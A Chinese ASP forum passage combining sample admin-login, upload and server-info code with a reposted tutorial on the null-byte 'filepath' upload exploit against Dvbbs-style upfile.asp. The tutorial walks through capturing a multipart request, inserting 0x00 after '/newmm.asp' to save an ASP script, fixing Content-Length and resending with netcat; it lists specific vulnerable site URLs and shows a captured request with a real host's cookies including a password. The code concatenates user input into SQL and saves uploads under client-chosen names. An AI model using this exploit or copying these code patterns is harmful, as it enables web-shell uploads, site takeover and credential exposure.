&字符就转到出错页面 response.redirect "Error.asp" response.end end if next pwd=md5(pwd) if admin="" or pwd="" then Response.Redirect ("Index.asp") end if set rs=server.createobject("adodb.recordset") sql="select * from admin where admin='"&admin&"'and pwd='"&pwd&"'" rs.open sql,conn,1,1 if not rs.eof then session("admin")=admin response.redirect"main.asp" else response.redirect"Error.asp" response.end end if end if if request("action")="logout" then session("admin")="" response.redirect"../index.asp" end if %> error.asp 登陆出错,三秒钟自动返回 其它想加密的页面调用chk.asp pwd.asp修改密码 <% if request("action")="edit" then admin=trim(request.form("admin")) pwd=md5(trim(request.form("pwd"))) set rs=server.createobject("adodb.recordset") sql="select * from admin" rs.open sql,conn,3,2 rs("admin")=admin rs("pwd")=pwd rs.update set rs=nothing set conn=nothing response.write"<script language='javascript'>alert('修改成功!');location.href('Admin_Admin.asp'); ------------------------ <form method="POST" action="?action=edit"> " size="20"> " size="20"> form> info.asp(读取服务器基本参数) 无标题文档

恭喜:你已成功登陆后台管理!
 服务器名:  <%=Request.ServerVariables("SERVER_NAME")%>
 服务器IP:  <%=Request.ServerVariables("LOCAL_ADDR")%>
 服务器端口:  <%=Request.ServerVariables("SERVER_PORT")%>
 服务器时间:  <%=now%>
 IIS版本:  <%=Request.ServerVariables("SERVER_SOFTWARE")%>
 服务器操作系统:  <%=Request.ServerVariables("OS")%>
 脚本超时时间:  <%=Server.ScriptTimeout%> 秒
 站点物理路径:  <%=request.ServerVariables("APPL_PHYSICAL_PATH")%>
 服务器CPU数量:  <%=Request.ServerVariables("NUMBER_OF_PROCESSORS")%> 个
 服务器解译引擎:  <%=ScriptEngine & "/"& ScriptEngineMajorVersion &"."&ScriptEngineMinorVersion&"."& ScriptEngineBuildVersion %>
 本文件路径:  <%=Request.ServerVariables("PATH_TRANSLATED")%>
无组件ASP文件上传源代码
无组件ASP文件上传源代码 记得在建立一个文件夹"updata" saveannounce_upload.asp 上传页 ------------------------------------ body {font-size:9pt;} input {font-size:9pt;} 文件上传 文件 ------------------------------------ saveannouce_upfile.asp 保存文件到服务器 ------------------------------------ 文件上传 <% dim upload,file,formName,formPath set upload=new upload_5xSoft ''建立上传对象 formPath=upload.form("filepath") ''在目录后加(/) if right(formPath,1)"/" then formPath=formPath&"/" for each formName in upload.file ''列出所有上传了的文件 set file=upload.file(formName) ''生成一个文件对象 if file.filesize<100 then response.write "请先选择你要上传的文件 [ 重新上传 ]" response.end end if if file.filesize>500*1000 then '设置上传文件大小为500K response.write "文件大小超过了限制 500K [ 重新上传 ]" response.end end if if file.FileSize>0 then ''如果 FileSize > 0 说明有文件数据 file.SaveAs Server.mappath("updata\"&file.FileName) ''保存文件 end if set file=nothing next set upload=nothing response.write "文件上传成功 [ 继续上传 ]" %> ------------------------------------ upload.inc 建立upload对象 ------------------------------------ dim upfile_5xSoft_Stream Class upload_5xSoft dim Form,File,Version Private Sub Class_Initialize dim iStart,iFileNameStart,iFileNameEnd,iEnd,vbEnter,iFormStart,iFormEnd,theFile dim strDiv,mFormName,mFormValue,mFileName,mFileSize,mFilePath,iDivLen,mStr Version="" if Request.TotalBytes<1 then Exit Sub set Form=CreateObject("Scripting.Dictionary") set File=CreateObject("Scripting.Dictionary") set upfile_5xSoft_Stream=CreateObject("Adodb.Stream") upfile_5xSoft_Stream.mode=3 upfile_5xSoft_Stream.type=1 upfile_5xSoft_Stream.open upfile_5xSoft_Stream.write Request.BinaryRead(Request.TotalBytes) vbEnter=Chr(13)&Chr(10) iDivLen=inString(1,vbEnter)+1 strDiv=subString(1,iDivLen) iFormStart=iDivLen iFormEnd=inString(iformStart,strDiv)-1 while iFormStart 0 and iFileNameStartiStart then mFileSize=iEnd-iStart-4 else mFileSize=0 end if set theFile=new FileInfo theFile.FileName=getFileName(mFileName) theFile.FilePath=getFilePath(mFileName) theFile.FileSize=mFileSize theFile.FileStart=iStart+4 theFile.FormName=FormName file.add mFormName,theFile else iStart=inString(iEnd+1,vbEnter&vbEnter) iEnd=inString(iStart+4,vbEnter&strDiv) if iEnd>iStart then mFormValue=subString(iStart+4,iEnd-iStart-4) else mFormValue="" end if form.Add mFormName,mFormValue end if iFormStart=iformEnd+iDivLen iFormEnd=inString(iformStart,strDiv)-1 wend End Sub Private Function subString(theStart,theLen) dim i,c,stemp upfile_5xSoft_Stream.Position=theStart-1 stemp="" for i=1 to theLen if upfile_5xSoft_Stream.EOS then Exit for c=ascB(upfile_5xSoft_Stream.Read(1)) If c > 127 Then if upfile_5xSoft_Stream.EOS then Exit for stemp=stemp&Chr(AscW(ChrB(AscB(upfile_5xSoft_Stream.Read(1)))&ChrB(c))) i=i+1 else stemp=stemp&Chr(c) End If Next subString=stemp End function Private Function inString(theStart,varStr) dim i,j,bt,theLen,str InString=0 Str=toByte(varStr) theLen=LenB(Str) for i=theStart to upfile_5xSoft_Stream.Size-theLen if i>upfile_5xSoft_Stream.size then exit Function upfile_5xSoft_Stream.Position=i-1 if AscB(upfile_5xSoft_Stream.Read(1))=AscB(midB(Str,1)) then InString=i for j=2 to theLen if upfile_5xSoft_Stream.EOS then inString=0 Exit for end if if AscB(upfile_5xSoft_Stream.Read(1))AscB(MidB(Str,j,1)) then InString=0 Exit For end if next if InString0 then Exit Function end if next End Function Private Sub Class_Terminate form.RemoveAll file.RemoveAll set form=nothing set file=nothing upfile_5xSoft_Stream.close set upfile_5xSoft_Stream=nothing End Sub Private function GetFilePath(FullPath) If FullPath "" Then GetFilePath = left(FullPath,InStrRev(FullPath, "\")) Else GetFilePath = "" End If End function Private function GetFileName(FullPath) If FullPath "" Then GetFileName = mid(FullPath,InStrRev(FullPath, "\")+1) Else GetFileName = "" End If End function Private function toByte(Str) dim i,iCode,c,iLow,iHigh toByte="" For i=1 To Len(Str) c=mid(Str,i,1) iCode =Asc(c) If iCode255 Then iLow = Left(Hex(Asc(c)),2) iHigh =Right(Hex(Asc(c)),2) toByte = toByte & chrB("&H"&iLow) & chrB("&H"&iHigh) Else toByte = toByte & chrB(AscB(c)) End If Next End function End Class Class FileInfo dim FormName,FileName,FilePath,FileSize,FileStart Private Sub Class_Initialize FileName = "" FilePath = "" FileSize = 0 FileStart= 0 FormName = "" End Sub Public function SaveAs(FullPath) dim dr,ErrorChar,i SaveAs=1 if trim(fullpath)="" or FileSize=0 or FileStart=0 or FileName="" then exit function if FileStart=0 or right(fullpath,1)="/" then exit function set dr=CreateObject("Adodb.Stream") dr.Mode=3 dr.Type=1 dr.Open upfile_5xSoft_Stream.position=FileStart-1 upfile_5xSoft_Stream.copyto dr,FileSize dr.SaveToFile FullPath,2 dr.Close set dr=nothing SaveAs=0 end function End Class
asp 之上传漏洞终结篇
asp 之上传漏洞终结
先锋无组件上传类(无惧2.0杜绝上传漏洞修改版) v2004
上传漏洞终结篇 一、写在前面 ***这个上传漏洞利用的原理只是针对form格式上传的asp和php脚本*** NC(Netcat)   用于提交数据包   DOS界面下运行:   NC -vv www.***.com 80<1.txt   -vv: 回显   80: www端口   1.txt: 就是你要发送的数据包  (更多使用方法请查看本区的帖子) WSE(WSockExpert)   对本机端口的监视,抓取IE提交的数据包  (不会用的就自己到网上搜资料N多) 二、漏洞原理 下面例子假设的前提 www主机: www.***.com; bbs路径 : /bbs/ 漏洞源于对动网上传文件的研究,建议有一定编程经验的 看看Dvbbs的upfile.asp文件,没有必要全部看懂 upfile是通过生成一个form表上传,如下 <form name="form" method="post" action="upfile.asp" ...> form> 用到的变量: filepath 默认值uploadface 属性hiden act   默认值upload   属性hiden file1  就是你要传的那个文件 关键是 filepath 这个变量! 默认情况下我们的文件上传到www.***.com/bbs/uploadface/ 文件是用你的上传时间命名的,就是upfile里的这一句 FileName=FormPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&FileExt ------------------------------------------------------------------------- 我们知道计算机里面的数据是一"\0"为标致的用过C语言的都知道 char data[]="bbs" 这个data数组长度是4: b b s \0 如果我们构造filepath如下,会怎么样呢? filepath="/newmm.asp\0" 我们在2004.09.24.08.24传的文件就会发生变化 没有改时: http://www.***.com/bbs/uploadface/200409240824.jpg 用我们构造的filepath时: http://www.***.com/newmm.asp\0/200409240824.jpg 这样当服务器接收filepath数据时,检测到newmm.asp后面的\0 就理解为filepath的数据就结束了 这样我们上传的文件,比如c:\1.asp 就保存成: http://www.***.com/newmm.asp 三、后期补充 漏洞公布以后很多网站做了相应的处理,但是对于filepath的过滤和处理都不行 有很多网站只是加了N个hiden属性的变量对付网上公布的upfile.exe就是那个 上传漏洞利用工具或者filepath变量利用工具(老兵的)...但是最基本的没改啊。。 而且很对网站的插件里有类似的漏洞,我要说的不要依赖哪些专门的工具 自己改WSE抓到的包里的filepath变量,然后在用NC提交。。。 就算他加N个hiden变量也于事无补。 当然,如果对filepath做了很严格的过滤的话我们的这些理论就将宣告终结 就是我们的新理论诞生的时候! 四、漏洞列表 http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5369http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5530http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5531http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5693http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5731http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5746 监听外部主机     NC [-options] hostname port[s] [ports] ... 监听本地主机     NC -l -p port [options] [hostname] [port] options:     -d       detach from console, stealth mode     -e prog     inbound program to exec [dangerous!!]     -g gateway   source-routing hop point[s], up to 8     -G num     source-routing pointer: 4, 8, 12, ...     -h       this cruft     -i secs     delay interval for lines sent, ports scanned     -l       listen mode, for inbound connects     -L       listen harder, re-listen on socket close     -n       numeric-only IP addresses, no DNS     -o file     hex dump of traffic     -p port     local port number     -r       randomize local and remote ports     -s addr     local source address     -t       answer TELNET negotiation     -u       UDP mode     -v       verbose [use twice to be more verbose]     -w secs     timeout for connects and final net reads     -z       zero-I/O mode [used for scanning] port numbers can be individual or ranges: m-n [inclusive] 详细实例: --------------------------------------------------------------------------------- 一、WSE抓包结果(存到1.txt里): POST /bbs/upPhoto/upfile.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://www.xin126.com/bbs/upPhoto/upload.asp Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7d423a138d0278 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) Host: www.xin126.com Content-Length: 1969 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDACCCCDCS=NJHCPHPALBCANKOBECHKJANF; isCome=1; GAMVANCOOKIES=1; regTime=2004%2D9%2D24+3%3A39%3A37; username=szjwwwww; pass=5211314; dl=0; userID=62; ltStyle=0; loginTry=1; userPass=eb03f6c72908fd84 -----------------------------7d423a138d0278 Content-Disposition: form-data; name="filepath" ../medias/myPhoto/ -----------------------------7d423a138d0278 ... ... 上传 -----------------------------7d423a138d0278-- --------------------------------------------------------------------------------- 二、UltraEdit打开1.txt改数据: ...... -----------------------------7d423a138d0278 Content-Disposition: form-data; name="filepath" /newmm.asp█         <===这个黑色代表一个空格是 0x20,改成0x00就可以了 ...... --------------------------------------------------------------------------------- 三、重新计算cookies长度,然后nc提交 Nc -vv www.xin126.com 80 <1.txt UltraEdit是一个16位编辑器网上可以下载得到 我们主要用来写那个结束标致: \0 ====>16位表示:0x00或者00H 其实你改的时候就直接再filepath的结尾处加个00就OK了 计算cookies长度===>你把fillepath改了之后、肯定是或+或—cookies的长度变了 ...... Host: www.xin126.com Content-Length: 1969 <======就是这个 Connection: Keep-Alive Cache-Control: no-cache ...... 计算会吧?一个字母、数字就是1 对于上传漏洞提出的解决思路:(仅供参考) 1、一般的上传是把上传路径作为一个变量来处理 ===>我们的对策就是把filepath变成常量。。。 这个方法是目前最有效的(我认为的) 2、加强对于\0的处理,原来我们是读到这里就结束 我们继续读直道下一个变量开始的地方,处理就OK了
ASP

28,407

社区成员

356,948

社区内容

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今

加载中

查看更多榜单
社区公告
暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章